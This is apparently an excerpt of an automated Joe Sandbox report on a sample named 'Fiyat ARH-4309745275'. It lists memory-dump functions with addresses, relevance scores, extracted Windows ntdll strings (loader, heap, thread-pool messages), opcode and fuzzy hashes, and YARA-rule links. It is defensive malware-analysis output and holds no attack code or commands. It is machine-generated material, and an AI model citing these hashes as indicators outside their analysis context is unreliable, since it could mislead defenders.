                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                  • API String ID: 0-1245972979
                  • Opcode ID: b03fbc1fb4bd4ce8a2090a05274d7e71d160228b6b1b7eb5aceed1322249fcef
                  • Instruction ID: 8916c12825fd2f6806af7b5468ff8783e74dd676d2b586a730340b17a5863672
                  • Opcode Fuzzy Hash: b03fbc1fb4bd4ce8a2090a05274d7e71d160228b6b1b7eb5aceed1322249fcef
                  • Instruction Fuzzy Hash: 7A614B72600B129FD72BCF1DC881B6ABBE5FF80B50F18859DE9559B291C734E841CB91
                  Function 01AD64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                  Download Yara Rule
                  Strings
                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B31028
                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B3106B
                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B310AE
                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B30FE5
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                  • API String ID: 0-1468400865
                  • Opcode ID: 23c8ed232ee025917a300e170ac2e8647c9f27d3422bc97cd768a36b8de88152
                  • Instruction ID: ce0a7790cc709b56654d17b48fdef880a7402d771bbbe513923f5eab896c1c38
                  • Opcode Fuzzy Hash: 23c8ed232ee025917a300e170ac2e8647c9f27d3422bc97cd768a36b8de88152
                  • Instruction Fuzzy Hash: 7471E4B1904745AFCB21EF28C884F9B7FA9EF94764F8404A8F9498B146D734D588CBD2
                  Function 01AF245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                  Download Yara Rule
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B3A9A2
                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B3A992
                  • LdrpDynamicShimModule, xrefs: 01B3A998
                  • apphelp.dll, xrefs: 01AF2462
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-176724104
                  • Opcode ID: b756d324256c77f5dd53c293dced48abe41e187d2d850f75dddd9f4bfd2d99c2
                  • Instruction ID: 14f2fef83d0b92f03ea30349f300a3ca75278b70f1766fb0d1623e7112bdcea1
                  • Opcode Fuzzy Hash: b756d324256c77f5dd53c293dced48abe41e187d2d850f75dddd9f4bfd2d99c2
                  • Instruction Fuzzy Hash: B1318832600201AFDB399FADD884FAA77B4FBC8B00F65419EF940E7255C7B09851CB80
                  Function 01AE29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                  Download Yara Rule
                  Strings
                  • HEAP[%wZ]: , xrefs: 01AE3255
                  • HEAP: , xrefs: 01AE3264
                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AE327D
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                  • API String ID: 0-617086771
                  • Opcode ID: d703e7d6ce1d3227aebbea760b22792dd1c1abf022769711c9a9c47bd4b23561
                  • Instruction ID: 8ebc2e46f4a3a941821b258c98d494e25709ad65aae09b14f29422cebb782bc2
                  • Opcode Fuzzy Hash: d703e7d6ce1d3227aebbea760b22792dd1c1abf022769711c9a9c47bd4b23561
                  • Instruction Fuzzy Hash: 0292CE71A042499FDF25CF68C448BAEBBF1FF48310F18809AE95AAB391D735A945CF50
                  Function 01AE0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-4253913091
                  • Opcode ID: 1fead25a99b79662e069bcdc7960f7dc55505593e7db894984f7310b070ea5c2
                  • Instruction ID: a8cd582e124ffea60618ec7f11529ce72ee33cf96823849163797a763ac922d8
                  • Opcode Fuzzy Hash: 1fead25a99b79662e069bcdc7960f7dc55505593e7db894984f7310b070ea5c2
                  • Instruction Fuzzy Hash: F3F19B70700606DFEB29CF69C998B6AB7F5FB84704F1482A8E4569B381D770E981CB90
                  Function 01AF6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: $@
                  • API String ID: 0-1077428164
                  • Opcode ID: c4dd66eaccc58f0e29325c9d627d5bab401840b149c311539e103d5519b5c7e2
                  • Instruction ID: 445eedec46e473afe5af80d0d59c4b0ea0638959f3c6f115a9b80260b1c18995
                  • Opcode Fuzzy Hash: c4dd66eaccc58f0e29325c9d627d5bab401840b149c311539e103d5519b5c7e2
                  • Instruction Fuzzy Hash: 44C291716083419FEB25CFA8C881BABBBE5AFC8754F04896DFA89D7241D734D805CB52
                  Function 01ACA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: FilterFullPath$UseFilter$\??\
                  • API String ID: 0-2779062949
                  • Opcode ID: a054031e35454e9a741aba3e6a39e0a1d2b696fa2083ec50d0a17b6ba69ffbf6
                  • Instruction ID: 0c86c14429c5d8c11081b24cbdfc26490c1473b25c30fb77fd97aba9d7259b05
                  • Opcode Fuzzy Hash: a054031e35454e9a741aba3e6a39e0a1d2b696fa2083ec50d0a17b6ba69ffbf6
                  • Instruction Fuzzy Hash: 99A12B719116299BDF359F68CC88BAEBBB8EF48710F1041E9E90DA7250D7359E88CF50
                  Function 01AF0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                  Download Yara Rule
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B3A121
                  • Failed to allocated memory for shimmed module list, xrefs: 01B3A10F
                  • LdrpCheckModule, xrefs: 01B3A117
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-161242083
                  • Opcode ID: a84daef6741649391a2e9ca32be835eb01a62bef89e7cf4af29dd4112f80eacc
                  • Instruction ID: 298bf73036286894ffaca44497c1be65a7ecb731bea24ffb91ca732e7e800c0c
                  • Opcode Fuzzy Hash: a84daef6741649391a2e9ca32be835eb01a62bef89e7cf4af29dd4112f80eacc
                  • Instruction Fuzzy Hash: 5671D071A002059FDB29DFA8CA84BBEB7F5FB88704F18406DE942D7256E734A942CB40
                  Function 01B0C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                  Download Yara Rule
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B482E8
                  • Failed to reallocate the system dirs string !, xrefs: 01B482D7
                  • LdrpInitializePerUserWindowsDirectory, xrefs: 01B482DE
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-1783798831
                  • Opcode ID: af10e1fdb0754e82f9282efcbc008429e742091e1dbb1c74e0585bb3cc94ac00
                  • Instruction ID: 6a9a1d5745bc66e94acd8c0dc536cd040e0b7a98ce1ea7be028721fcaf30082a
                  • Opcode Fuzzy Hash: af10e1fdb0754e82f9282efcbc008429e742091e1dbb1c74e0585bb3cc94ac00
                  • Instruction Fuzzy Hash: 6741F1B1540301AFD726EB68D944F9B7BE8FF48750F004AAAFA48D7290EB70D8008B95
                  Function 01B8C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                  Download Yara Rule
                  Strings
                  • @, xrefs: 01B8C1F1
                  • PreferredUILanguages, xrefs: 01B8C212
                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B8C1C5
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                  • API String ID: 0-2968386058
                  • Opcode ID: dfb2e33f48ee869a406ea52ac7d8a6d5f60e59c061c40bfd39c963c4928a4c1c
                  • Instruction ID: 3a096ef28122b15f1bc90a9240db644f05eb4db3c51dc06460fc1a3faa096958
                  • Opcode Fuzzy Hash: dfb2e33f48ee869a406ea52ac7d8a6d5f60e59c061c40bfd39c963c4928a4c1c
                  • Instruction Fuzzy Hash: CA4145B1D00219EBDF15EED8C851FEEBBB8EB54B14F1441AAE605B7280D7749A44CB60
                  Function 01B64144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                  • API String ID: 0-1373925480
                  • Opcode ID: fb466578907152dc4cfcdd4b4cf376b7f88932a24b1cea3aa6b007461c6c7a4d
                  • Instruction ID: 783f2333d3712cbdd6b8d344397398e9c11ef2cad33768da7d714909e4e7d6a3
                  • Opcode Fuzzy Hash: fb466578907152dc4cfcdd4b4cf376b7f88932a24b1cea3aa6b007461c6c7a4d
                  • Instruction Fuzzy Hash: 77410331A00A48CBEB29DBDAC944BADBBFCFF65340F240599DA01EB781D7798901CB10
                  Function 01B54755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                  Download Yara Rule
                  Strings
                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B54888
                  • minkernel\ntdll\ldrredirect.c, xrefs: 01B54899
                  • LdrpCheckRedirection, xrefs: 01B5488F
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                  • API String ID: 0-3154609507
                  • Opcode ID: 4f56ed02a40fb3f78e2c7efe700785bce82bb5a3e488fe41035766aaabaf705f
                  • Instruction ID: 3e8a5e0b974248e231671b12245296c0fada31b1ac8fe4eae36f2076a6b282e4
                  • Opcode Fuzzy Hash: 4f56ed02a40fb3f78e2c7efe700785bce82bb5a3e488fe41035766aaabaf705f
                  • Instruction Fuzzy Hash: 7D41B032A042519FDBA9DF69D840B267BE4FF49A50F0506A9ED4897311F731D880CB91
                  Function 01AE0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-2558761708
                  • Opcode ID: 801d1c2b5785d2518ac6c6c48ae40796c924d19131b851ee115af6a15086a893
                  • Instruction ID: d3e3557ec9720fbe72663730c1a1206f66d2db44e8d8d85782f0c5ab6f7f4120
                  • Opcode Fuzzy Hash: 801d1c2b5785d2518ac6c6c48ae40796c924d19131b851ee115af6a15086a893
                  • Instruction Fuzzy Hash: 1C11DC31314102DFDB2DDA28C959BAAB3A8FF80A16F1881ADF406CF255DB70E851C755
                  Function 01B520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                  Download Yara Rule
                  Strings
                  • minkernel\ntdll\ldrinit.c, xrefs: 01B52104
                  • LdrpInitializationFailure, xrefs: 01B520FA
                  • Process initialization failed with status 0x%08lx, xrefs: 01B520F3
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2986994758
                  • Opcode ID: 5df01c275d320ffbaf80b710000842d2c62f6035d9e517e3621e7315e54ecfde
                  • Instruction ID: 46afe48db6bcc7bb291b7eb2e6b4997115fd844d1f5d3360062d3a19c35b0019
                  • Opcode Fuzzy Hash: 5df01c275d320ffbaf80b710000842d2c62f6035d9e517e3621e7315e54ecfde
                  • Instruction Fuzzy Hash: AFF0C875641348BFEB28E74DDC47FD63B6CFB44B54F54009AFA4467285D3B0A500CA51
                  Function 01AE03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: #%u
                  • API String ID: 48624451-232158463
                  • Opcode ID: 959eb6fe9d40d252622cccf5a0ece8b2ff6233c5a3dc953b934bd39d5f8c14ea
                  • Instruction ID: 1016635a56aac4cf4d70902bcd463dced409f2c3f9fee73feb217056e2602cfc
                  • Opcode Fuzzy Hash: 959eb6fe9d40d252622cccf5a0ece8b2ff6233c5a3dc953b934bd39d5f8c14ea
                  • Instruction Fuzzy Hash: CB715871A0014A9FDB15DFA8CA84BAEBBF8FF48704F1440A5E905A7251EB34ED15CB60
                  Function 01ADA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                  Download Yara Rule
                  Strings
                  • LdrResSearchResource Enter, xrefs: 01ADAA13
                  • LdrResSearchResource Exit, xrefs: 01ADAA25
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                  • API String ID: 0-4066393604
                  • Opcode ID: 4b56fa5e4b45fc082fb3d3ff7fe3ff759634db18f47020db6c33bc4c6209e16b
                  • Instruction ID: 86b1dc2cba0620251f29c7d2bf09ac06c00600b4f90ba0987d40ce74fca3a5f2
                  • Opcode Fuzzy Hash: 4b56fa5e4b45fc082fb3d3ff7fe3ff759634db18f47020db6c33bc4c6209e16b
                  • Instruction Fuzzy Hash: EDE1B371E00A09AFEF26CF99C980BAEBBB9FF48310F1445A5E902E7261D734D941CB51
                  Function 01B9A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: `$`
                  • API String ID: 0-197956300
                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                  • Instruction ID: 4413750207a52bd67fc6dace0932f2983121f725139f53528b0ec3d46820e778
                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                  • Instruction Fuzzy Hash: 30C1AD312043429BEF29CE28C845B6BBBE5EFC4318F184A7DF6968B290D775D506CB81
                  Function 01B4E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Legacy$UEFI
                  • API String ID: 2994545307-634100481
                  • Opcode ID: 1690ed5f139f11ab7f2311c6ad478ee98d10e65e33310e18088947366dde0801
                  • Instruction ID: 58201be9a546351fa63e605020148ec1e7ccccf03526529bb7ba1dec64b4c60f
                  • Opcode Fuzzy Hash: 1690ed5f139f11ab7f2311c6ad478ee98d10e65e33310e18088947366dde0801
                  • Instruction Fuzzy Hash: 93615EB1E002199FEF19DFA8C940BADBBB9FB48700F5481ADE649EB251D735E900DB50
                  Function 01B743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$MUI
                  • API String ID: 0-17815947
                  • Opcode ID: 2f9f7e9da18e39e985bf4dd26599606a63688f890243aa6a28bf3153d34cab12
                  • Instruction ID: 7822e939ddf597387b78a71483b9430762e6f07417bb400f7e89c5805c15b1c6
                  • Opcode Fuzzy Hash: 2f9f7e9da18e39e985bf4dd26599606a63688f890243aa6a28bf3153d34cab12
                  • Instruction Fuzzy Hash: 485108B1E0021DAFDF15DFA9CD80AEEBBB8EB44755F1005A9E611B7290D7309A05CB60
                  Function 01AD04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                  Download Yara Rule
                  Strings
                  • kLsE, xrefs: 01AD0540
                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01AD063D
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                  • API String ID: 0-2547482624
                  • Opcode ID: ccb10df52997052bc67c03decb071c43fc4dd08220148bb415c5e9cc5f017ea9
                  • Instruction ID: ae15cf2c79414d7ff55fa4d715774e8e0ee19a7d5051109b01e50b9740b3ca21
                  • Opcode Fuzzy Hash: ccb10df52997052bc67c03decb071c43fc4dd08220148bb415c5e9cc5f017ea9
                  • Instruction Fuzzy Hash: 3651AD71504B429FD724EF78C6446A7BBE4AF84304F14883EFAEA87241E7B0E545CB92
                  Function 01ADA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                  Download Yara Rule
                  Strings
                  • RtlpResUltimateFallbackInfo Enter, xrefs: 01ADA2FB
                  • RtlpResUltimateFallbackInfo Exit, xrefs: 01ADA309
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                  • API String ID: 0-2876891731
                  • Opcode ID: 8dd9372a3800aa8f6d8b91d4ec391cd8580eed7e755fc80693d0d4774023d7de
                  • Instruction ID: bb4799f68d3d3b86b9865703aa58714310978bed47dccb8325ee02b20137c6a5
                  • Opcode Fuzzy Hash: 8dd9372a3800aa8f6d8b91d4ec391cd8580eed7e755fc80693d0d4774023d7de
                  • Instruction Fuzzy Hash: 3341D234A04A49DBDB19CF5DC440B6D7BB5FF85700F1840E9E916DB291EBB5DA00CB50
                  Function 01B0A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Cleanup Group$Threadpool!
                  • API String ID: 2994545307-4008356553
                  • Opcode ID: 0b39e929c716e2626ee329da56963c24652fd0852cdbb2ccbfdaa2d925db034e
                  • Instruction ID: e7b02a7faddacd5ce1f3a7f79a2b3ec69e6437df335bd5c26362a3f7a3e15999
                  • Opcode Fuzzy Hash: 0b39e929c716e2626ee329da56963c24652fd0852cdbb2ccbfdaa2d925db034e
                  • Instruction Fuzzy Hash: FA01D1B2640700AFD312DF24CD45F267BF8E785B15F0189B9B648CB190E334D804CB4A
                  Function 01ADC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: MUI
                  • API String ID: 0-1339004836
                  • Opcode ID: 0748eff495198ff00821a751c05de017be11d22db1f554eb7ed0e9d355a95a4e
                  • Instruction ID: bcbd4f9447fcd4966f70c90b2b1fb1cc12ce681fb46c14ecf9f80917184dfaad
                  • Opcode Fuzzy Hash: 0748eff495198ff00821a751c05de017be11d22db1f554eb7ed0e9d355a95a4e
                  • Instruction Fuzzy Hash: 00828E75E00A188FEB25CFA9C980BEDBBB1BF48720F148169D95AAB395D7309D41CF50
                  Function 01B56420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 969860252b69af2cd7c07439400aba2f93535ac9ec34ee669a44e36d2b3a78d4
                  • Instruction ID: 14ab1a978d9b6859b3e0843ec1d3e2d72bf6711927bb2f9aedc434cd97c3078a
                  • Opcode Fuzzy Hash: 969860252b69af2cd7c07439400aba2f93535ac9ec34ee669a44e36d2b3a78d4
                  • Instruction Fuzzy Hash: 9A917172940219AFEF25DB95DD85FAE7BB8EF18750F500199FB00AB190D774AD04CBA0
                  Function 01B7E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 34d95f2810128ea003ac42ac1de620099fb43baa5a3faf39826088846c6da139
                  • Instruction ID: 851a7a07aa80f783e652dc8449e791c819fe0e4425b4d19f64a9ab1e2f9c39b9
                  • Opcode Fuzzy Hash: 34d95f2810128ea003ac42ac1de620099fb43baa5a3faf39826088846c6da139
                  • Instruction Fuzzy Hash: 0791AF71900609BFDF2AABA5DD84FAFBBB9EF85740F1100A9F615A7250DB34D901CB90
                  Function 01B0A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: GlobalTags
                  • API String ID: 0-1106856819
                  • Opcode ID: 5641032e091357ba9698dd96955f2c278ff2cd469add9412fd9b553aa1d9b7d8
                  • Instruction ID: f911a702cdc8f021567c1f3f5cf2c9144db61b32b72abf867d96b45ae1b5ec42
                  • Opcode Fuzzy Hash: 5641032e091357ba9698dd96955f2c278ff2cd469add9412fd9b553aa1d9b7d8
                  • Instruction Fuzzy Hash: 8F717CB5E0020A9FEF28CF9CD5906ADBBB1FF59710F14C1AEE905A7241EB319941DB50
                  Function 01B74978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: .mui
                  • API String ID: 0-1199573805
                  • Opcode ID: ed14688332d400cf71ec0571f5caba21e27cb7e02447e819d2e01e186fdb7057
                  • Instruction ID: e1eedd86d2e90e332345ebf3fdc3af5be7f89694c346ff487fb457e69fbef3b1
                  • Opcode Fuzzy Hash: ed14688332d400cf71ec0571f5caba21e27cb7e02447e819d2e01e186fdb7057
                  • Instruction Fuzzy Hash: B5518272D002299FDF18EF99D940AAEBBB4FF09711F0541A9EA21B7250D7349C01CBA4
                  Function 01AEE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: EXT-
                  • API String ID: 0-1948896318
                  • Opcode ID: 9f88a826eeb86f08243f98613c67b97360e02f7867545ad95f4b0588be83b632
                  • Instruction ID: 0ed87cfbe818f72c6c5d14700b0d5c7bb49755fe9c2141f61b5b23c189dbbdbb
                  • Opcode Fuzzy Hash: 9f88a826eeb86f08243f98613c67b97360e02f7867545ad95f4b0588be83b632
                  • Instruction Fuzzy Hash: 3441E272648312ABD720DB75D948B6BBBE8EF88714F440A2DF684D7180E774D908C797
                  Function 01B4C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
